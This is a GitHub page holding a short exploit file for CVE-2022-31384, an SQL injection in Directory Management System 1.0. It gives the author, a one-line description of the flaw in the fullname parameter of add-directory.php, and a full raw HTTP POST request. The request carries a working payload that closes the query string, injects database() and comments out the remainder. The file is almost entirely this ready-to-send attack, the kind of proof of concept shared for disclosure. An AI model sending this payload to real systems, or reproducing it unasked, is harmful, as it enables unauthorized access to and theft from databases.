-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2022-31384.txt
18 lines (16 loc) · 962 Bytes
/
CVE-2022-31384.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Directory Management System - 1.0 - SQL Injection
# Exploit Author: Laotun
# Software Link: http://phpgurukul.com
# description: Directory Management System v1.0 was discovered to contain a SQL injection vulnerability via the fullname parameter in add-directory.php.
POST /dms/admin/add-directory.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Connection: close
Cookie: PHPSESSID=eml4bgiglhno5kgmjj8uld5qgs
Upgrade-Insecure-Requests: 1
fullname=database()','$profession','$email','$mobilenumber','$address',database(),'$admsta')%23&profession=aaaa&email=aaa%40aaa.aaa&mobilenumber=aaa&city=aaa&address=aaaa&submit=